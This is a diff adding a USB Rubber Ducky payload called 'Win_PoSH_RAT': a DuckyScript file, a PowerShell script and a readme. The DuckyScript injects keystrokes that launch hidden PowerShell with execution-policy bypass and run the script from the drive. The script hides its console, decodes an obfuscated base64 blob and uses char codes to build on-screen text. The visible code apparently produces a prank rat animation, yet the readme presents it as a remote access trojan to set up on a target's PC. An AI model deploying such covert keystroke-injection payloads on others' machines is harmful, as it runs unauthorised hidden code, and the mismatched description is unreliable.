diff --git a/payloads/library/execution/Win_PoSH_RAT/R.ps1 b/payloads/library/execution/Win_PoSH_RAT/R.ps1 new file mode 100644 index 0000000..772fbc8 --- /dev/null +++ b/payloads/library/execution/Win_PoSH_RAT/R.ps1 @@ -0,0 +1,59 @@ +function Hide-ConsoleWindow() { + $ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' + $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru + + $hwnd = (Get-Process -PID $pid).MainWindowHandle + if ($hwnd -ne [System.IntPtr]::Zero) { + # When you got HWND of the console window: + # (It would appear that Windows Console Host is the default terminal application) + $ShowWindowAsync::ShowWindowAsync($hwnd, 0) + } else { + # When you failed to get HWND of the console window: + # (It would appear that Windows Terminal is the default terminal application) + + # Mark the current console window with a unique string. + $UniqueWindowTitle = New-Guid + $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle + $StringBuilder = New-Object System.Text.StringBuilder 1024 + + # Search the process that has the window title generated above. + $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle }) + # Get the window handle of the terminal process. + # Note that GetConsoleWindow() in Win32 API returns the HWND of + # powershell.exe itself rather than the terminal process. + # When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(), + # the Windows Terminal window will be just minimized rather than hidden. + $hwnd = $TerminalProcess.MainWindowHandle + if ($hwnd -ne [System.IntPtr]::Zero) { + $ShowWindowAsync::ShowWindowAsync($hwnd, 0) + } else { + Write-Host "Failed to hide the console window." + } + } +} +Hide-ConsoleWindow; +[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms"); +Add-Type -Assembly PresentationFramework +$I = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String('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')) +$O = New-Object System.IO.MemoryStream; +$Z = New-Object System.IO.Compression.GzipStream $I, ([IO.Compression.CompressionMode]::Decompress); +$Z.CopyTo($O); +$Z.Close(); +$I.Close(); +$GR = $true; +$S = [System.Windows.Forms.Screen]::PrimaryScreen; +$W = [Windows.Markup.XamlReader]::Load((New-Object System.Xml.XmlNodeReader([xml][System.Text.Encoding]::UTF8.GetString($O.ToArray())))); +$O.Close(); +$R = $W.FindName("R"); +$X = $W.FindName("U"); +$X.Text = "$U`n$([char]64)$IP`n$([char]105+[char]115+[char]32+[char]97+[char]32+[char]82+[char]97+[char]116)"; +$H = [Windows.Input.MouseButtonEventHandler]{$W.Close();$_.Handled=$true;} +$W.Add_MouseRightButtonDown($H); +$W.Left = $S.WorkingArea.Left; +$W.Top = $S.Bounds.Height - $W.Height; +$T = New-Object System.Windows.Forms.Timer; +$T.Interval = 100; +$T.add_Tick({if($GR){if(($W.Left+5)-lt($S.WorkingArea.Width-$W.Width)){$W.Left=($W.Left+5)}else{$R.ScaleX=-1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"100,0,0,0" }}else{if(($W.Left-5)-gt0){$W.Left=($W.Left-5)}else{$R.ScaleX=1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"0"}}}); +$W.Add_Closing({$T.Stop();$T.Dispose();}) +$T.Start(); +$W.ShowDialog(); \ No newline at end of file diff --git a/payloads/library/execution/Win_PoSH_RAT/payload.txt b/payloads/library/execution/Win_PoSH_RAT/payload.txt new file mode 100644 index 0000000..bf964c0 --- /dev/null +++ b/payloads/library/execution/Win_PoSH_RAT/payload.txt @@ -0,0 +1,41 @@ +REM TITLE R.A.T +REM AUTHOR TRIBBIC +REM DESCRIPTION Set up a R.A.T on the target windows machine +REM DUCKY SCRIPT 3 + +REM USERNAME to login to the R.A.T +DEFINE #USERNAME name +REM Your IP Address use https://www.ipchicken.com/ to get your IP +DEFINE #IPADDRESS 192.168.1.1 +ATTACKMODE HID STORAGE +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +GUI r +DELAY 200 +STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1') \ No newline at end of file diff --git a/payloads/library/execution/Win_PoSH_RAT/readme.md b/payloads/library/execution/Win_PoSH_RAT/readme.md new file mode 100644 index 0000000..e704af9 --- /dev/null +++ b/payloads/library/execution/Win_PoSH_RAT/readme.md @@ -0,0 +1,22 @@ +# RAT +- Author: TRIBBIC +- Version: 1.0 +- Target: Windows 10 (Powershell 5.1+) +- Category: Execution +- Attackmode: HID & Storage +- Ducky Script Version: 3 + +## Setup +In the payload.txt change the two DEFINE's + +\#USERNAME Should be your login name + +\#IPADDRESS Should be your IP Address + +## Description +Create a R.A.T using Windows Powershell on Targets PC + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | \ No newline at end of file